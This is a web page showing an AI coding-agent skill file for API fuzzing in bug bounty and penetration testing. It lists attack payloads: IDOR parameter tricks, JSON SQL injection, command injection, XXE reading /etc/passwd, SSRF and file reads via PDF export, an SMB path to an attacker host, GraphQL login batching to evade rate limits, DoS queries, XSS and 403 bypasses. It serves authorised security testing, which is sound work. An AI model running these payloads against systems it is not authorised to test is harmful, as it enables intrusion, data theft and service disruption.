>_

API Fuzzing for Bug Bounty

This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.

$ Instalar

git clone https://github.com/zebbern/claude-code-guide /tmp/claude-code-guide && cp -r /tmp/claude-code-guide/skills/api-fuzzing-bug-bounty ~/.claude/skills/claude-code-guide

// tip: Run this command in your terminal to install the skill

SKILL.md
View on GitHub →

name: API Fuzzing for Bug Bounty description: This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.

API Fuzzing for Bug Bounty

Purpose

Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.

Inputs/Prerequisites

  • Burp Suite or similar proxy tool
  • API wordlists (SecLists, api_wordlist)
  • Understanding of REST/GraphQL/SOAP protocols
  • Python for scripting
  • Target API endpoints and documentation (if available)

Outputs/Deliverables

  • Identified API vulnerabilities
  • IDOR exploitation proofs
  • Authentication bypass techniques
  • SQL injection points
  • Unauthorized data access documentation

API Types Overview

TypeProtocolData FormatStructure
SOAPHTTPXMLHeader + Body
RESTHTTPJSON/XML/URLDefined endpoints
GraphQLHTTPCustom QuerySingle endpoint

Core Workflow

Step 1: API Reconnaissance

Identify API type and enumerate endpoints:

# Check for Swagger/OpenAPI documentation
/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html

# Use Kiterunner for API discovery
kr scan https://target.com -w routes-large.kite

# Extract paths from Swagger
python3 json2paths.py swagger.json

Step 2: Authentication Testing

# Test different login paths
/api/mobile/login
/api/v3/login
/api/magic_link
/api/admin/login

# Check rate limiting on auth endpoints
# If no rate limit → brute force possible

# Test mobile vs web API separately
# Don't assume same security controls

Step 3: IDOR Testing

Insecure Direct Object Reference is the most common API vulnerability:

# Basic IDOR
GET /api/users/1234 → GET /api/users/1235

# Even if ID is email-based, try numeric
/?user_id=111 instead of /?user_id=user@mail.com

# Test /me/orders vs /user/654321/orders

IDOR Bypass Techniques:

# Wrap ID in array
{"id":111} → {"id":[111]}

# JSON wrap
{"id":111} → {"id":{"id":111}}

# Send ID twice
URL?id=<LEGIT>&id=<VICTIM>

# Wildcard injection
{"user_id":"*"}

# Parameter pollution
/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id":<legit_id>,"user_id":<victim_id>}

Step 4: Injection Testing

SQL Injection in JSON:

{"id":"56456"}                    → OK
{"id":"56456 AND 1=1#"}           → OK  
{"id":"56456 AND 1=2#"}           → OK
{"id":"56456 AND 1=3#"}           → ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"}     → SLEEP 15 SEC

Command Injection:

# Ruby on Rails
?url=Kernel#open → ?url=|ls

# Linux command injection
api.url.com/endpoint?name=file.txt;ls%20/

XXE Injection:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

SSRF via API:

<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>

.NET Path.Combine Vulnerability:

# If .NET app uses Path.Combine(path_1, path_2)
# Test for path traversal
https://example.org/download?filename=a.png
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
https://example.org/download?filename=\\smb.dns.attacker.com\a.png

Step 5: Method Testing

# Test all HTTP methods
GET /api/v1/users/1
POST /api/v1/users/1
PUT /api/v1/users/1
DELETE /api/v1/users/1
PATCH /api/v1/users/1

# Switch content type
Content-Type: application/json → application/xml

GraphQL-Specific Testing

Introspection Query

Fetch entire backend schema:

{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}

URL-encoded version:

/graphql?query={__schema{types{name,kind,description,fields{name}}}}

GraphQL IDOR

# Try accessing other user IDs
query {
  user(id: "OTHER_USER_ID") {
    email
    password
    creditCard
  }
}

GraphQL SQL/NoSQL Injection

mutation {
  login(input: {
    email: "test' or 1=1--"
    password: "password"
  }) {
    success
    jwt
  }
}

Rate Limit Bypass (Batching)

mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}

GraphQL DoS (Nested Queries)

query {
  posts {
    comments {
      user {
        posts {
          comments {
            user {
              posts { ... }
            }
          }
        }
      }
    }
  }
}

GraphQL XSS

# XSS via GraphQL endpoint
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}

# URL-encoded XSS
http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E

GraphQL Tools

ToolPurpose
GraphCrawlerSchema discovery
graphw00fFingerprinting
clairvoyanceSchema reconstruction
InQLBurp extension
GraphQLmapExploitation

Endpoint Bypass Techniques

When receiving 403/401, try these bypasses:

# Original blocked request
/api/v1/users/sensitivedata → 403

# Bypass attempts
/api/v1/users/sensitivedata.json
/api/v1/users/sensitivedata?
/api/v1/users/sensitivedata/
/api/v1/users/sensitivedata??
/api/v1/users/sensitivedata%20
/api/v1/users/sensitivedata%09
/api/v1/users/sensitivedata#
/api/v1/users/sensitivedata&details
/api/v1/users/..;/sensitivedata

Output Exploitation

PDF Export Attacks

<!-- LFI via PDF export -->
<iframe src="file:///etc/passwd" height=1000 width=800>

<!-- SSRF via PDF export -->
<object data="http://127.0.0.1:8443"/>

<!-- Port scanning -->
<img src="http://127.0.0.1:445"/>

<!-- IP disclosure -->
<img src="https://iplogger.com/yourcode.gif"/>

DoS via Limits

# Normal request
/api/news?limit=100

# DoS attempt
/api/news?limit=9999999999

Common API Vulnerabilities Checklist

VulnerabilityDescription
API ExposureUnprotected endpoints exposed publicly
Misconfigured CachingSensitive data cached incorrectly
Exposed TokensAPI keys/tokens in responses or URLs
JWT WeaknessesWeak signing, no expiration, algorithm confusion
IDOR / BOLABroken Object Level Authorization
Undocumented EndpointsHidden admin/debug endpoints
Different VersionsSecurity gaps in older API versions
Rate LimitingMissing or bypassable rate limits
Race ConditionsTOCTOU vulnerabilities
XXE InjectionXML parser exploitation
Content Type IssuesSwitching between JSON/XML
HTTP Method TamperingGET→DELETE/PUT abuse

Quick Reference

VulnerabilityTest PayloadRisk
IDORChange user_id parameterHigh
SQLi' OR 1=1-- in JSONCritical
Command Injection; ls /Critical
XXEDOCTYPE with ENTITYHigh
SSRFInternal IP in paramsHigh
Rate Limit BypassBatch requestsMedium
Method TamperingGET→DELETEHigh

Tools Reference

CategoryToolURL
API FuzzingFuzzapigithub.com/Fuzzapi/fuzzapi
API FuzzingAPI-fuzzergithub.com/Fuzzapi/API-fuzzer
API FuzzingAstragithub.com/flipkart-incubator/Astra
API Securityapicheckgithub.com/BBVA/apicheck
API DiscoveryKiterunnergithub.com/assetnote/kiterunner
API Discoveryopenapi_security_scannergithub.com/ngalongc/openapi_security_scanner
API ToolkitAPIKitgithub.com/API-Security/APIKit
API KeysAPI Guesserapi-guesser.netlify.app
GUIDGUID Guessergist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18
GraphQLInQLgithub.com/doyensec/inql
GraphQLGraphCrawlergithub.com/gsmith257-cyber/GraphCrawler
GraphQLgraphw00fgithub.com/dolevf/graphw00f
GraphQLclairvoyancegithub.com/nikitastupin/clairvoyance
GraphQLbatchqlgithub.com/assetnote/batchql
GraphQLgraphql-copgithub.com/dolevf/graphql-cop
WordlistsSecListsgithub.com/danielmiessler/SecLists
Swagger ParserSwagger-EZrhinosecuritylabs.github.io/Swagger-EZ
Swagger Routesswagroutesgithub.com/amalmurali47/swagroutes
API MindmapMindAPIdsopas.github.io/MindAPI/play
JSON Pathsjson2pathsgithub.com/s0md3v/dump/tree/master/json2paths

Constraints

Must:

  • Test mobile, web, and developer APIs separately
  • Check all API versions (/v1, /v2, /v3)
  • Validate both authenticated and unauthenticated access

Must Not:

  • Assume same security controls across API versions
  • Skip testing undocumented endpoints
  • Ignore rate limiting checks

Should:

  • Add X-Requested-With: XMLHttpRequest header to simulate frontend
  • Check archive.org for historical API endpoints
  • Test for race conditions on sensitive operations

Examples

Example 1: IDOR Exploitation

# Original request (own data)
GET /api/v1/invoices/12345
Authorization: Bearer <token>

# Modified request (other user's data)
GET /api/v1/invoices/12346
Authorization: Bearer <token>

# Response reveals other user's invoice data

Example 2: GraphQL Introspection

curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name}}}}"}'

Troubleshooting

IssueSolution
API returns nothingAdd X-Requested-With: XMLHttpRequest header
401 on all endpointsTry adding ?user_id=1 parameter
GraphQL introspection disabledUse clairvoyance for schema reconstruction
Rate limitedUse IP rotation or batch requests
Can't find endpointsCheck Swagger, archive.org, JS files

Repository

zebbern
zebbern
Author
zebbern/claude-code-guide/skills/api-fuzzing-bug-bounty
2.9k
Stars
254
Forks
Updated4d ago
Added5d ago

Actions

View on GitHubDownload ZIPReport Issue

Related Skills

skill-writer
pytorch/pytorch
95.4k
add-uint-support
pytorch/pytorch
95.4k
skill-creator
openai/codex
54.7k
Command Development
anthropics/claude-code
47.9k
Plugin Structure
anthropics/claude-code
47.9k